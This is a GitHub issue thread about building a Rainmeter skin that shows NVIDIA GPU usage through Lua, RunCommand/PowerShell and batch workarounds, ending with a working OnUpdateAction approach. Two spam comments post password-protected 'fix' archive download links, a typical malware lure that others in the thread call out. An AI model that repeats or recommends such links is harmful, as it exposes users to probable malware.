### ISSUE TITLE
GPUs Meter

### ISSUE THREAD

**Issue by The-GhostRider** [rainmeter/rainmeter#384]
Apparently, (it would seem), that Rainmaster is not able to read the GPU usage in the PC.

I've made several attempts.

This is my Skin:
![image](https://github.com/user-attachments/assets/2890319c-3ba7-44f5-8b68-22ffacbc851a)

**These are the code variants that I tried to use to obtain some results:**

### [LUA]:
```
-- gpu_usage.lua
function Update()
    -- Run the nvidia-smi command and read the output
    local handle = io.popen('nvidia-smi --query-gpu=utilization.gpu --format=csv,noheader,nounits')
    local result = handle:read("*a"):gsub("%s+", "") -- Reads everything and removes whitespace
    handle:close()
    
    -- Returns the value as a string
    return tonumber(result) or 0
end
```

### [Ini Syntax]
```
;--------[GPU]---------
[Variables]
IncludePath=E:\My\Rainmeter\Path\Plugins
IncludePathFile1=gpu_usage.lua

[MeasureGPU1CoreLoad]
Measure=Plugin
Plugin=LuaScript
Script=#IncludePath#\#IncludePathFile1#
UpdateDivider=1
DynamicVariables=1

[MeterGPU1CoreGraph]
MeasureName=MeasureGPU1CoreLoad
Meter=Line
LineCount=1
LineColor=#COLORGRAPH#
AntiAlias=0
AutoScale=1
X=403
Y=190
H=45
W=140

[MeterGPUCorePercent]
Meter=String
MeasureName=MeasureGPU1CoreLoad
MeterStyle=StyleLEFT
FontFace=Ink Free
X=550
Y=240
Postfix="%"
Text="%1"
Percentual=1
AutoScale=1
UpdateDivider=1
DynamicVariables=1

[MeterGPUCoreLabel]
Meter=STRING
MeterStyle=StyleRIGHT
FontFace=Ink Free
X=-1r
Y=240
Text="GPU NVIDIA: "
```

**I also tried this version too:**
```
;--------[GPU]---------

[MeasureGPU1CoreLoad]
Measure=Plugin
Plugin=RunCommand
Program=PowerShell
Parameter=(nvidia-smi --query-gpu=utilization.gpu --format=csv,noheader,nounits).Trim()
OutputType=ANSI
RegExpSubstitute=1
Index=#1
UpdateDivider=1
DynamicVariables=1

[MeterGPU1CoreGraph]
MeasureName=MeasureGPU1CoreLoad
Meter=Line
LineCount=1
LineColor=#COLORGRAPH#
AntiAlias=0
AutoScale=1
X=403
Y=190
h=45
w=140

[MeterGPUCorePercent]
Meter=String
MeasureName=MeasureGPU1CoreLoad
MeterStyle=StyleLEFT
FontFace=Ink Free
X=550
Y=240
PostFix="%"
Text="%1"
Percentual=1
AutoScale=1
Index=#1
UpdateDivider=1
DynamicVariables=1

[MeterGPUCoreLabel]
Meter=STRING
MeterStyle=StyleRIGHT
FontFace=Ink Free
X=-1r
Y=240
Text="GPU NVIDIA: "
```

**And not happy with that, I also tried this other "Workaround"**
### [Batch]:
```
@echo off
nvidia-smi --query-gpu=utilization.gpu --format=csv,noheader,nounits > gpu_usage.txt
```

### [Ini Syntax]
```
[Variables]
IncludePath=E:\My\Rainmeter\Path\Plugins
IncludePathFile1=gpu_usage.bat
IncludePathFile2=gpu_usage.txt

[MeasureGPU1]
Measure=Plugin
Plugin=RunCommand
Program=cmd.exe
Parameter=/C "#IncludePath#\#IncludePathFile1#"
UpdateDivider=1
DynamicVariables=1

[MeasureGPUUsage]
Measure=FileRead
FileName=[#IncludePath#\#IncludePathFile2#]
UpdateDivider=2
DynamicVariables=1

[MeterGraph1]
MeasureName=MeasureGPU1
MeterStyle=StyleLEFT
FontFace=Ink Free
Meter=Line
LineCount=1
LineColor=#COLORGRAPH#
AntiAlias=0
AutoScale=1
H=45
W=110
X=390
Y=350

[MeterGraph2]
MeasureName=MeasureGPU1
MeterStyle=StyleLEFT
FontFace=Ink Free
Meter=Line
LineColor=#COLORGRAPH#
AntiAlias=1
AutoScale=1
H=45
W=110
X=390
Y=350

[MeterGPU1Percent]
Meter=STRING
MeasureName=MeasureGPUUsage
MeterStyle=StyleLEFT
FontFace=Ink Free
X=472
Y=350
Postfix=%
Text="%1"
AutoScale=1
DynamicVariables=1

[MeterGPU1Label]
Meter=STRING
MeterStyle=StyleRIGHT
FontFace=Ink Free
X=-1r
Y=350
Text="GPU:"
```

But none of this worked..

Any ideas?

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by The-GhostRider** [comment]
> Download https://www.mediafire.com/file/czdodbba054p738/fix.rar/file password: changeme In the installer menu, select "gcc."

![image](https://github.com/user-attachments/assets/6b27216d-dfd0-4ab7-8e18-e7b9667cb7bb)

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by brianferguson** [comment]
I believe `io.popen` is [restricted](https://docs.rainmeter.net/manual/lua-scripting/#Restrictions) in Rainmeter.

Have you tried the [UsageMonitor](https://docs.rainmeter.net/manual/plugins/usagemonitor/) plugin?

-Brian

**Comment by brianferguson** [comment]
@c0ffincolors : Mediafire blocked your file. Not sure what your comment has to do with this.

**Comment by The-GhostRider** [comment]
> @c0ffincolors : Mediafire blocked your file. Not sure what your comment has to do with this.

Ban Him, he had already made me the exact same comment with this other account that now no longer exists because he deleted it. https://github.com/OtakuFra1

Then I replied to him with a screenshot of the site, like this:
![image](https://github.com/user-attachments/assets/dad00eda-0f00-4b11-8ceb-efa6434aa8ce)

And then he deleted his Post, and now he recreated it with another account.

**Comment by The-GhostRider** [comment]
> @The-GhostRider : I believe `io.popen` is [restricted](https://docs.rainmeter.net/manual/lua-scripting/#Restrictions) in Rainmeter.
> 
> Have you tried the [UsageMonitor](https://docs.rainmeter.net/manual/plugins/usagemonitor/) plugin?
> 
> -Brian

I don't know exactly.
I tried something with this Plugin at first but with poor success..

So, I don't know if it was my incompetence or if the plugin for this type of function doesn't work.

**Comment by brianferguson** [comment]
You might want to post something on the [forums](https://forum.rainmeter.net/index.php). Maybe someone else has some insight.

-Brian

**Comment by The-GhostRider** [comment]
@brianferguson 

Anyway, this code should have worked.
```
;--------[GPU]---------

[MeasureGPU1CoreLoad]
Measure=Plugin
Plugin=RunCommand
Program=PowerShell
Parameter=(nvidia-smi --query-gpu=utilization.gpu --format=csv,noheader,nounits).Trim()
OutputType=ANSI
RegExpSubstitute=1
Index=#1
UpdateDivider=1
DynamicVariables=1

[MeterGPU1CoreGraph]
MeasureName=MeasureGPU1CoreLoad
Meter=Line
LineCount=1
LineColor=#COLORGRAPH#
AntiAlias=0
AutoScale=1
X=403
Y=190
h=45
w=140

[MeterGPUCorePercent]
Meter=String
MeasureName=MeasureGPU1CoreLoad
MeterStyle=StyleLEFT
FontFace=Ink Free
X=550
Y=240
PostFix="%"
Text="%1"
Percentual=1
AutoScale=1
Index=#1
UpdateDivider=1
DynamicVariables=1

[MeterGPUCoreLabel]
Meter=STRING
MeterStyle=StyleRIGHT
FontFace=Ink Free
X=-1r
Y=240
Text="GPU NVIDIA: "
```

Because I tried in Powershell and this command works:
"
(nvidia-smi --query-gpu=utilization.gpu --format=csv,noheader,nounits).Trim()
"
And it gives me exactly the GPU Usage reading

So, this Setup should theoretically work:
```
Measure=Plugin
Plugin=RunCommand
Program=PowerShell
Parameter=(nvidia-smi --query-gpu=utilization.gpu --format=csv,noheader,nounits).Trim()
```

And if it doesn't work, I think there is a Bug in the RunCommand Plugin.

**Comment by brianferguson** [comment]
Did you actually `Run` the RunCommand measure? (I don't see it anywhere in your code).
https://docs.rainmeter.net/manual/plugins/runcommand/#Run

-Brian

**Comment by The-GhostRider** [comment]
> Measure=Plugin
> Plugin=RunCommand
> Program=PowerShell
> Parameter=(nvidia-smi --query-gpu=utilization.gpu --format=csv,noheader,nounits).Trim()

No, in fact there is not, but for a good reason..

By putting the command:
`LeftMouseUpAction=[!CommandMeasure MeasureRun "Run"]`
It would mean setting a `Manual Triger` for an event that should instead **start and update automatically**..
As the image below shows:
![image](https://github.com/user-attachments/assets/42a34a07-d22a-4773-8f2e-1a99ae793789)

So this "RunCommand" Plugin works under a false premise, the premise is that it needs a "Switch/Button".

And this is not good for functions/events that should have an automatic and constant update..

**Comment by The-GhostRider** [comment]
@brianferguson 

However, thanks to you who passed me the Forum Link, I found a semblance of a solution, because it doesn't work very well... that's why I say "semblance".

```
;--------[GPU]---------

[MeasureGPU1CoreLoad]
Measure=Plugin
Plugin=UsageMonitor
Alias=GPU 1

[MeterGPU1CoreGraph]
MeasureName=MeasureGPU1CoreLoad
Meter=Line
LineCount=1
LineColor=#COLORGRAPH#
AntiAlias=1
AutoScale=1
X=403
Y=190
h=45
w=140

[MeterGPUCorePercent]
Meter=String
MeasureName=MeasureGPU1CoreLoad
MeterStyle=StyleLEFT
FontFace=Ink Free
X=550
Y=240
PostFix="%"
Text="%1"
Percentual=1
AutoScale=1
Index=1
UpdateDivider=1
DynamicVariables=1

[MeterGPUCoreLabel]
Meter=STRING
MeterStyle=StyleRIGHT
FontFace=Ink Free
X=-1r
Y=240
Text="GPU NVIDIA: "
```

As you can see, both the graph and the percentage part work, only that the percentage part instead of showing the "Number" shows the string "Total"
![image](https://github.com/user-attachments/assets/7c7baf21-0c18-41f1-8279-c616e7876a63)

And I have no idea why the Value does not appear in the "String" column and the word "Total" appears instead.

**Comment by The-GhostRider** [comment]
> ```ini
> [RunGPUCommand]
> Measure=Calc
> Formula=1
> OnUpdateAction=[!CommandMeasure MeasureGPU1CoreLoad Run]
> 
> [MeasureGPU1CoreLoad]
> Measure=Plugin
> Plugin=RunCommand
> Program=PowerShell
> Parameter=(nvidia-smi --query-gpu=utilization.gpu --format=csv,noheader,nounits).Trim()
> OutputType=ANSI
> ```

Thank you so much Brian you are such a genius!
I didn't know you could use this command. `OnUpdateAction=`

thanks a lot again!
